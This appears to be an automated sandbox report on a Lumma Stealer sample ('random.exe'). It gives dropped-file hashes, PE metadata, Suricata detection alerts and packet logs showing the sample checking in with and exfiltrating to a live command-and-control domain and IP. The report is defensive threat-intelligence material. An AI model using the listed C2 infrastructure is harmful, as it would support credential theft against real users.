C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_random.exe_ca1f07f5125e6bc91f62c19534af66d94f4128a_f759ac22_e704cede-f9d8-47b8-bdcb-ab76450523ff\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8858331213149667
Encrypted:	false
SSDEEP:	96:YmFfMlh2C28s2gejTOAqyS3QXIDcQlc6VcEdcw31+BHUHZ0ownOgHkEwH3dEFYAZ:/llC28aA0LR3kaGGzuiFcoZ24IO8n
MD5:	3384BACA49EE74A6A28F249756F5F343
SHA1:	33B5E87CAB428CE0A2EBA9DE211B16B24FEFEDA2
SHA-256:	C6841072507B266FBDB0CFD365F9D4738D67ECC71653F2A29D7C78FD185FB9F7
SHA-512:	93E3F1D8B44F1AA0FC1EBA4C931E22DE12D5D58C93304370F2FBA330CAF7043328423107EC50D96D214E1A051004633732A6619DD048562149CCAB29E9FC4D35
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.0.6.8.1.6.0.5.3.0.4.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.0.6.8.1.6.5.3.7.4.2.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.0.4.c.e.d.e.-.f.9.d.8.-.4.7.b.8.-.b.d.c.b.-.a.b.7.6.4.5.0.5.2.3.f.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.9.2.4.3.0.7.-.2.d.3.4.-.4.9.7.f.-.b.0.f.3.-.1.6.d.0.b.a.d.5.5.2.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.a.n.d.o.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.c.-.0.0.0.1.-.0.0.1.4.-.2.6.e.8.-.5.f.a.2.b.a.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.6.9.c.0.3.1.1.f.0.b.1.2.1.e.b.3.7.8.e.9.0.a.1.d.d.8.8.9.2.5.c.4.2.4.c.1.a.0.7.b.!.r.a.n.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1D7.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jan 8 10:46:56 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	153425
Entropy (8bit):	3.743957904588716
Encrypted:	false
SSDEEP:	1536:g299GlU7uBojRVpN4uE2aOcLTgiAqbF0t5sCDJtTSUTfuFZjt:gUpVJ4uEqcLTgabF0zXPY5
MD5:	F46F0CAC4AC4B6DF778F7FDEBE909F4F
SHA1:	19A3FECCBB7E73D5462EE116C4E58ED8485A100F
SHA-256:	F7070EA10F665C4E1EDC4FFF355A1E0A51D1E894B8E58A3EECFAB5A9BF174F4B
SHA-512:	DC0AFCCEF9F8AA1A0C9BB43742E2586DE832B7BA7D754DCCE6A80DE84FE671D5B08514709FD55842E04471540CCAB6B5102A04D85A81C20232C2C69088A20C44
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........W~g....................................$................/..........`.......8...........T...........P$...3......................................................................................................eJ......P.......GenuineIntel............T.......L....W~g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2E2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.688864417670488
Encrypted:	false
SSDEEP:	192:R6l7wVeJiP6XaC6Y9OSUDGgmfbVJzyprt89bWtsfcrSm:R6lXJS6p6YkSUDGgmfbVJBWmfS
MD5:	E7AFA7CF72E3EB07C69DABE50AFC4818
SHA1:	CFBA44C679BA49B7B53BF9CF8C7D27122A745DEC
SHA-256:	90BA2ECAD71B0AB78C235008B6180BF0A3F5F078944699EBEE01621F82CA37BC
SHA-512:	30B09A484114FD3C80DE1D9792BF3914D4744A417DB959E2559121B47CC1F113F9448B24F6BA62EF4B06EE9F84B18AE04948291AB515262235D991F170FF34EB
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD322.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4730
Entropy (8bit):	4.427648113002853
Encrypted:	false
SSDEEP:	48:cvIwWl8zspJg77aI9uAyWpW8VYJYm8M4JlR0dxPcf6FI+q8vpR0dxPcfRQycwd:uIjf7I78I7V1JlRlfDKpRlfRQycwd
MD5:	9414A14E706E7D7CD712E743718FC3F8
SHA1:	1EB9D634FB8048BAA53982AA7B409A8BABEAB6F7
SHA-256:	05D1195AF188D10216386274498377711D84C240CDE0CB783E21537AC5F7358C
SHA-512:	113B3328768E4CD72802953E5DA2F544BF927E122C7407098EC193DF8532450FBC1550177CF92118AE7BF2D4B02C6F62CAF1D00599B750BB86D73EA15DCA2062
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666829" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465510249772632
Encrypted:	false
SSDEEP:	6144:2IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNjdwBCswSbWL:7XD94+WlLZMM6YFHN+WL
MD5:	B31BB713B15D94E1AA6303CCB713C049
SHA1:	970FD3537CAAC992083F70066ED7183A13B7180F
SHA-256:	8AC2F87484629DCDD8D8ED1034F921D56D6925F2B353B6398591F72CF9DD482C
SHA-512:	ECC2382BFD99EA050B41FC3FF3D13D45D17F9BEA6216E7D332318999DF4A10B78FD5A426ECBB08A707C9CF07D3262913B11F8634B4332B8F81727DB28F7294CD
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....a...............................................................................................................................................................................................................................................................................................................................................Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.968250820517949
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	random.exe
File size:	349'696 bytes
MD5:	6446a00eb59754e15749af229b0d5217
SHA1:	69c0311f0b121eb378e90a1dd88925c424c1a07b
SHA256:	558fe8c705bbd035f886cc02acee3fdfa50398e74795f62d182e01225d58e2e2
SHA512:	63ffddb80faa7013dc4c665e1614ee7175d313868636e2d6bc9b8e1fa941134ff425f6f02c64a5509eb97a9be8bb87a2a9859cd57e72d10b7bbf13887cf0ba58
SSDEEP:	6144:AT1Bgj04zLS/70E7IodJ6vsVzsooEAPmIV49g2/GzrtXAlGSExj76f:Gb45zA7Fv6vsVOzm9t/Gzr9AsdP6f
TLSH:	6374131057CBC170DAA6273228504E206BEBF74D1DC38DCDB489759F961AFA20B677AC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AL................0..B...........a... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40619e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6150	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x610a	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x41a4	0x4200	3fd86cd640fad1b0e3c70a019e57ee90	False	0.5025449810606061	data	5.884139579646745	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x598	0x600	97b5e78dd91bc3fa97e695160eb75d4a	False	0.41015625	data	4.031118916432586	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	0553d30171535035af0137d669b879da	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0xc000	0x50800	0x50800	271045b038ee6a75896b67a0c0c4955d	False	1.0003366411102483	data	7.999373253801423	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80a0	0x30c	data			0.41923076923076924
RT_MANIFEST	0x83ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T11:46:57.113787+0100	2058397	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)	1	192.168.2.4	58005	1.1.1.1	53	UDP
2025-01-08T11:46:57.624092+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49731	188.114.97.3	443	TCP
2025-01-08T11:46:57.624092+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	188.114.97.3	443	TCP
2025-01-08T11:46:58.190213+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	188.114.97.3	443	TCP
2025-01-08T11:46:58.190213+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	188.114.97.3	443	TCP
2025-01-08T11:46:58.723867+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49733	188.114.97.3	443	TCP
2025-01-08T11:46:58.723867+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	188.114.97.3	443	TCP
2025-01-08T11:46:59.202131+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49733	188.114.97.3	443	TCP
2025-01-08T11:46:59.202131+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	188.114.97.3	443	TCP
2025-01-08T11:46:59.832079+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49736	188.114.97.3	443	TCP
2025-01-08T11:46:59.832079+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	188.114.97.3	443	TCP
2025-01-08T11:47:02.382077+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49740	188.114.97.3	443	TCP
2025-01-08T11:47:02.382077+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	188.114.97.3	443	TCP
2025-01-08T11:47:03.904266+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-08T11:47:03.904266+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-08T11:47:05.131058+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-08T11:47:05.131058+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-08T11:47:05.600120+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-08T11:47:06.348119+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49746	188.114.97.3	443	TCP
2025-01-08T11:47:06.348119+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	188.114.97.3	443	TCP
2025-01-08T11:47:06.352320+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49746	188.114.97.3	443	TCP
2025-01-08T11:47:10.415669+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	49749	188.114.97.3	443	TCP
2025-01-08T11:47:10.415669+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49749	188.114.97.3	443	TCP
2025-01-08T11:47:10.911021+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49749	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 11:46:57.137763023 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:57.137784958 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:57.137856960 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:57.140708923 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:57.140722990 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:57.624025106 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:57.624092102 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:57.628391027 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:57.628396988 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:57.628662109 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:57.680793047 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:57.777384996 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:57.777415037 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:57.777513027 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.190243959 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.190330982 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.190380096 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.193372011 CET	49731	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.193382025 CET	443	49731	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.266021013 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.266072989 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.266220093 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.266607046 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.266623020 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.723664045 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.723866940 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.725111008 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.725121975 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.725379944 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:58.726619959 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.726674080 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:58.726687908 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202126980 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202174902 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202204943 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202233076 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202267885 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202284098 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.202301979 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202321053 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.202402115 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.202450991 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202636003 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202665091 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202706099 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202708006 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.202714920 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.202749014 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.206768036 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.206840038 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.206845999 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.258941889 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.258951902 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.288605928 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.288638115 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.288667917 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.288675070 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.288722992 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.288726091 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.288770914 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.288975000 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.288975000 CET	49733	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.288995981 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.289002895 CET	443	49733	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.371968985 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.372009039 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.372081995 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.372623920 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.372634888 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.831990004 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.832078934 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.833568096 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.833575964 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.833828926 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.842977047 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.843137980 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.843166113 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:46:59.843224049 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:46:59.843230009 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:01.904930115 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:01.905030966 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:01.905087948 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:01.905261993 CET	49736	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:01.905277967 CET	443	49736	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:01.924913883 CET	49740	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:01.924953938 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:01.925040960 CET	49740	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:01.925379038 CET	49740	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:01.925395012 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:02.382003069 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:02.382076979 CET	49740	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:02.386029005 CET	49740	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:02.386035919 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:02.386287928 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:02.401230097 CET	49740	443	192.168.2.4	188.114.97.3
